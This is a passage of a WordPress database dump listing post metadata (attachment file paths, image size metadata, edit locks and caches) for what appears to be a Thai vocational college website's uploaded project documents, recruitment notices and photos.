(6562, 2543, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:836;s:6:\"height\";i:326;s:4:\"file\";s:30:\"2018/05/17-5-2561-18-05-19.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-300x117.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:117;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-768x299.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:299;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"17-5-2561-18-05-19-400x156.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:156;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6563, 2555, '_edit_lock', '1534584203:1'),
(6564, 2555, '_edit_last', '1'),
(6565, 2555, '_hide_featured', NULL),
(6566, 2558, '_edit_lock', '1526954179:3'),
(6567, 2558, '_edit_last', '3'),
(6568, 2559, '_wp_attached_file', '2018/05/1-ปกโครงการ.jpg'),
(6569, 2559, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2480;s:6:\"height\";i:3508;s:4:\"file\";s:41:\"2018/05/1-ปกโครงการ.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"1-ปกโครงการ-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"1-ปกโครงการ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:42:\"1-ปกโครงการ-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:42:\"1-ปกโครงการ-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:41:\"1-ปกโครงการ-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(6570, 2560, '_wp_attached_file', '2018/05/2-บทคัดย่อ.docx'),
(6571, 2561, '_wp_attached_file', '2018/05/2.1กิตติกรรมประกาศ.docx'),
(6572, 2562, '_wp_attached_file', '2018/05/3-คำนำ.docx'),
(6573, 2563, '_wp_attached_file', '2018/05/4.1-สารบัญ.docx'),
(6574, 2564, '_wp_attached_file', '2018/05/4.2-สารบัญตาราง.docx'),
(6575, 2565, '_wp_attached_file', '2018/05/4.3-สารบัญภาพ.docx'),
(6576, 2566, '_wp_attached_file', '2018/05/5.1-บทที่-1-โครงการ.doc'),
(6577, 2567, '_wp_attached_file', '2018/05/5.2-บทที่2โครงการ.doc'),
(6578, 2568, '_wp_attached_file', '2018/05/5.3-บทที่-3-โครงการ.doc'),
(6579, 2569, '_wp_attached_file', '2018/05/5.4-บทที่-4-โครงการ.docx'),
(6580, 2570, '_wp_attached_file', '2018/05/5.5-บทที่-5-โครงการ.docx');
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(6581, 2571, '_wp_attached_file', '2018/05/6-รายงานผลโครงการ.docx'),
(6582, 2572, '_wp_attached_file', '2018/05/7-คำสั่งองค์การ.docx'),
(6583, 2573, '_wp_attached_file', '2018/05/7.1-ประกาศองค์การ-แก้ไข.docx'),
(6584, 2574, '_wp_attached_file', '2018/05/8-ขอเชิญประชุมคณะกรรมการดำเนินงาน.docx'),
(6585, 2575, '_wp_attached_file', '2018/05/8.1-ขออนุญาตจัดประชุม.docx'),
(6586, 2576, '_wp_attached_file', '2018/05/9-บันทึกการประชุม.docx'),
(6587, 2577, '_wp_attached_file', '2018/05/10-รายงานการประชุม.docx'),
(6588, 2578, '_wp_attached_file', '2018/05/11-ลงลายมือชื่อการประชุม.docx'),
(6589, 2579, '_wp_attached_file', '2018/05/12-รายงานการประชุมเขียนแล้ว.docx'),
(6590, 2580, '_wp_attached_file', '2018/05/13-ขอความอนุเคราะห์ประชาสัมพันธ์-R-1.docx'),
(6591, 2581, '_wp_attached_file', '2018/05/14-ขออนุญาตประชาสัมพันธ์.docx'),
(6592, 2582, '_wp_attached_file', '2018/05/14.1-สถานีวิทยุ-R-radio-101.00-MHz-R-2.docx'),
(6593, 2583, '_wp_attached_file', '2018/05/14.2-การเชิญเข้าร่วมโครงการรณรงค์ปลูกป่า.docx'),
(6594, 2584, '_wp_attached_file', '2018/05/14.3-การเชิญเข้าร่วมโครงการ.docx'),
(6595, 2585, '_wp_attached_file', '2018/05/14.4-แจ้งข่าวสารผ่านสื่อออนไลน.docx'),
(6596, 2586, '_wp_attached_file', '2018/05/15.กำหนดการโครงการ.doc'),
(6597, 2587, '_wp_attached_file', '2018/05/16-แบบลงทะเบียนเข้าร่วมโครงการ.xlsx'),
(6598, 2588, '_wp_attached_file', '2018/05/16.1-สรุปสมาชิกทั้งหมด.docx'),
(6599, 2589, '_wp_attached_file', '2018/05/16.2-ลงลายมือชื่ออาจารย์ที่เข้าร่วมโครงการ.doc'),
(6600, 2590, '_wp_attached_file', '2018/05/17-คำกล่าวของพิธีกร.doc'),
(6601, 2591, '_wp_attached_file', '2018/05/18-สรุปและรายงานผลการปฏิบัติงาน.docx'),
(6602, 2592, '_wp_attached_file', '2018/05/19-ภาพที่-๑-แสดงภาพบรรยากาศของโครงการ.docx'),
(6603, 2593, '_wp_attached_file', '2018/05/19.1-ป้ายบนแผนกโครงการรณรงค์ปลูกป่า.docx'),
(6604, 2594, '_wp_attached_file', '2018/05/19.2-แบบสอบถามโครงการ.docx'),
(6605, 2595, '_wp_attached_file', '2018/05/19.3-รูปโครงการ.doc'),
(6606, 2596, '_wp_attached_file', '2018/05/19.4-บรรณานุกรม.docx'),
(6607, 2597, '_wp_attached_file', '2018/05/19.5-บรรณานุกรม-1.docx'),
(6608, 2598, '_wp_attached_file', '2018/05/20-คั่นหน้า.docx'),
(6609, 2558, '_hide_featured', NULL),
(6610, 2608, '_wp_attached_file', '2018/05/ปกโครงการ.pdf'),
(6611, 2610, '_edit_lock', '1526954677:3'),
(6612, 2610, '_edit_last', '3'),
(6613, 2611, '_wp_attached_file', '2018/05/รับสมัครคัดเลือกลูกจ้างชั่วคราว.pdf'),
(6617, 2610, '_hide_featured', NULL),
(6618, 2610, '_wpas_done_all', '1'),
(6619, 2610, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1568859494;s:7:\"payload\";a:0:{}}}'),
(6620, 2615, '_edit_lock', '1526954497:3'),
(6621, 2615, '_edit_last', '3'),
(6622, 2616, '_wp_attached_file', '2018/05/รับสมัครคัดเลือกครูอัตราจ้าง-2.pdf'),
(6623, 2617, '_wp_attached_file', '2018/05/รับสมัครคัดเลือกลูกจ้างชั่วคราว-1.pdf'),
(6627, 2615, '_hide_featured', NULL),
(6628, 2615, '_wpas_done_all', '1'),
(6633, 2615, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575723094;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5046;}i:1;a:1:{s:2:\"id\";i:4139;}i:2;a:1:{s:2:\"id\";i:5481;}}}}'),
(6634, 2623, '_edit_lock', '1526976908:3'),
(6635, 2623, '_edit_last', '3'),
(6636, 2624, '_wp_attached_file', '2018/05/รับสมัครคัดเลือกครูต่างชาติ.pdf'),
(6640, 2623, '_hide_featured', NULL),
(6641, 2623, '_wpas_done_all', '1'),
(6644, 2623, '_jetpack_related_posts_cache', 'a:1:{s:32:\"e9d3f781f9e815d5944bbe7ec1825f4d\";a:2:{s:7:\"expires\";i:1575635135;s:7:\"payload\";a:0:{}}}'),
(6645, 2627, '_edit_lock', '1526961995:3'),
(6646, 2627, '_edit_last', '3'),
(6651, 2627, '_hide_featured', NULL),
(6652, 2627, '_wpas_done_all', '1'),
(6656, 2627, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1571220167;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6040;}i:1;a:1:{s:2:\"id\";i:5936;}i:2;a:1:{s:2:\"id\";i:4093;}}}}'),
(6662, 2623, '_wp_old_slug', 'announcement-for-personal-recruitment-as-a-temporary-employee-foreign-teacher-for-2-positions__trashed'),
(6668, 2637, '_wp_attached_file', '2018/05/รับสมัครคัดเลือกครูต่างชาติedit.pdf'),
(6671, 2640, '_wp_attached_file', '2018/05/รับสมัครคัดเลือกครูต่างชาติedit-1.pdf'),
(6674, 2642, '_edit_lock', '1535078332:3'),
(6675, 2642, '_edit_last', '3'),
(6676, 2643, '_wp_attached_file', '2018/05/22-5-2561-15-18-45.jpg'),
(6677, 2643, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:192;s:6:\"height\";i:239;s:4:\"file\";s:30:\"2018/05/22-5-2561-15-18-45.jpg\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-18-45-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6678, 2644, '_wp_attached_file', '2018/05/22-5-2561-15-19-05.jpg'),
(6679, 2644, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:577;s:6:\"height\";i:153;s:4:\"file\";s:30:\"2018/05/22-5-2561-15-19-05.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"22-5-2561-15-19-05-300x80.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:80;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-05-400x106.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:106;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6680, 2645, '_wp_attached_file', '2018/05/22-5-2561-15-19-23.jpg'),
(6681, 2645, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:477;s:6:\"height\";i:344;s:4:\"file\";s:30:\"2018/05/22-5-2561-15-19-23.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-23-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-23-300x216.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:216;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"22-5-2561-15-19-23-400x288.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:288;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6682, 2642, '_hide_featured', NULL),
(6683, 2658, '_wp_attached_file', '2018/05/4215345.jpg'),
(6684, 2658, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:768;s:4:\"file\";s:19:\"2018/05/4215345.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"4215345-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:19:\"4215345-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:19:\"4215345-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:20:\"4215345-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:19:\"4215345-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6685, 2661, '_edit_lock', '1527478643:1'),
(6686, 2661, '_edit_last', '1'),
(6687, 2662, '_wp_attached_file', '2018/05/อวท.01.1.docx'),
(6688, 2663, '_wp_attached_file', '2018/05/อวท.02.2.docx'),
(6689, 2664, '_wp_attached_file', '2018/05/อวท.02.3.docx'),
(6690, 2665, '_wp_attached_file', '2018/05/อวท.02.4.docx'),
(6691, 2666, '_wp_attached_file', '2018/05/อวท.03docx.docx'),
(6692, 2667, '_wp_attached_file', '2018/05/อวท.04.docx'),
(6693, 2668, '_wp_attached_file', '2018/05/อวท.05.1.docx'),
(6694, 2669, '_wp_attached_file', '2018/05/อวท.05.docx'),
(6695, 2670, '_wp_attached_file', '2018/05/อวท.06.1.docx'),
(6696, 2671, '_wp_attached_file', '2018/05/อวท.06.docx'),
(6697, 2672, '_wp_attached_file', '2018/05/อวท.07.1.docx'),
(6698, 2673, '_wp_attached_file', '2018/05/อวท.07.docx'),
(6699, 2674, '_wp_attached_file', '2018/05/อวท.08.docx'),
(6700, 2675, '_wp_attached_file', '2018/05/อวท.09.docx'),
(6701, 2676, '_wp_attached_file', '2018/05/อวท.10.docx'),
(6702, 2677, '_wp_attached_file', '2018/05/อวท.11.1.docx'),
(6703, 2678, '_wp_attached_file', '2018/05/อวท.11.docx'),
(6704, 2679, '_wp_attached_file', '2018/05/อวท.12.docx'),
(6705, 2680, '_wp_attached_file', '2018/05/อวท.13.docx'),
(6706, 2681, '_wp_attached_file', '2018/05/อวท.14.docx'),
(6707, 2682, '_wp_attached_file', '2018/05/อวท.15.docx'),
(6708, 2683, '_wp_attached_file', '2018/05/อวท.16.docx'),
(6709, 2684, '_wp_attached_file', '2018/05/อวท.17.docx'),
(6710, 2685, '_wp_attached_file', '2018/05/อวท.18.docx'),
(6711, 2686, '_wp_attached_file', '2018/05/อวท.19.docx'),
(6712, 2687, '_wp_attached_file', '2018/05/อวท.20.docx'),
(6713, 2688, '_wp_attached_file', '2018/05/อวท.21.docx'),
(6714, 2689, '_wp_attached_file', '2018/05/อวท.22.docx'),
(6715, 2690, '_wp_attached_file', '2018/05/อวท.23.docx'),
(6716, 2691, '_wp_attached_file', '2018/05/อวท.24.docx'),
(6717, 2692, '_wp_attached_file', '2018/05/อวท.25.1.docx'),
(6718, 2693, '_wp_attached_file', '2018/05/อวท.25.docx'),
(6719, 2694, '_wp_attached_file', '2018/05/อวท.27.docx'),
(6720, 2695, '_wp_attached_file', '2018/05/อวท.28docx.docx'),
(6721, 2696, '_wp_attached_file', '2018/05/อวท.29.docx'),
(6722, 2697, '_wp_attached_file', '2018/05/อวท.30.docx'),
(6723, 2698, '_wp_attached_file', '2018/05/อวท.31.docx'),
(6724, 2699, '_wp_attached_file', '2018/05/อวท.32.docx'),
(6725, 2700, '_wp_attached_file', '2018/05/อวท.33.docx'),
(6726, 2701, '_wp_attached_file', '2018/05/อวท.34.docx'),
(6727, 2702, '_wp_attached_file', '2018/05/อวท.35.docx'),
(6728, 2703, '_wp_attached_file', '2018/05/อวท.36.docx'),
(6729, 2661, '_hide_featured', NULL),
(6730, 2712, '_edit_lock', '1527048724:3'),
(6731, 2712, '_edit_last', '3'),
(6732, 2713, '_wp_attached_file', '2018/05/31729936_577688159274043_8460682417424826368_o.jpg'),
(6733, 2713, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/05/31729936_577688159274043_8460682417424826368_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"31729936_577688159274043_8460682417424826368_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"31729936_577688159274043_8460682417424826368_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"31729936_577688159274043_8460682417424826368_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"31729936_577688159274043_8460682417424826368_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"31729936_577688159274043_8460682417424826368_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6734, 2712, '_thumbnail_id', '2713'),
(6738, 2712, '_hide_featured', NULL),
(6739, 2712, '_wpas_done_all', '1'),
(6740, 2716, '_edit_lock', '1527049670:3'),
(6741, 2716, '_edit_last', '3'),
(6745, 2716, '_hide_featured', NULL),
(6746, 2716, '_wpas_done_all', '1'),
(6747, 2719, '_wp_attached_file', '2018/05/31755393_577707672605425_9154701174853599232_o.jpg'),
(6748, 2719, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1500;s:6:\"height\";i:1000;s:4:\"file\";s:58:\"2018/05/31755393_577707672605425_9154701174853599232_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"31755393_577707672605425_9154701174853599232_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"31755393_577707672605425_9154701174853599232_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"31755393_577707672605425_9154701174853599232_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"31755393_577707672605425_9154701174853599232_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"31755393_577707672605425_9154701174853599232_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6749, 2716, '_thumbnail_id', '2719'),
(6758, 2723, '_edit_lock', '1527050531:3'),
(6759, 2723, '_edit_last', '3'),
(6760, 2723, '_oembed_92d9423ee2b2b8098dd9f14e239172de', '{{unknown}}'),
(6761, 2724, '_wp_attached_file', '2018/05/31960619_580078705701655_3009427663833006080_o.jpg'),
(6762, 2724, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/05/31960619_580078705701655_3009427663833006080_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"31960619_580078705701655_3009427663833006080_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"31960619_580078705701655_3009427663833006080_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"31960619_580078705701655_3009427663833006080_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"31960619_580078705701655_3009427663833006080_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"31960619_580078705701655_3009427663833006080_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6763, 2725, '_wp_attached_file', '2018/05/31946440_580075529035306_5860757633039859712_o.jpg'),
(6764, 2725, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/05/31946440_580075529035306_5860757633039859712_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"31946440_580075529035306_5860757633039859712_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"31946440_580075529035306_5860757633039859712_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"31946440_580075529035306_5860757633039859712_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"31946440_580075529035306_5860757633039859712_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"31946440_580075529035306_5860757633039859712_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(6765, 2726, '_wp_attached_file', '2018/05/31958716_580075182368674_6625282560714866688_o.jpg'),
(6766, 2726, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1296;s:6:\"height\";i:864;s:4:\"file\";s:58:\"2018/05/31958716_580075182368674_6625282560714866688_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"31958716_580075182368674_6625282560714866688_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"31958716_580075182368674_6625282560714866688_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"31958716_580075182368674_6625282560714866688_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"31958716_580075182368674_6625282560714866688_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"31958716_580075182368674_6625282560714866688_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
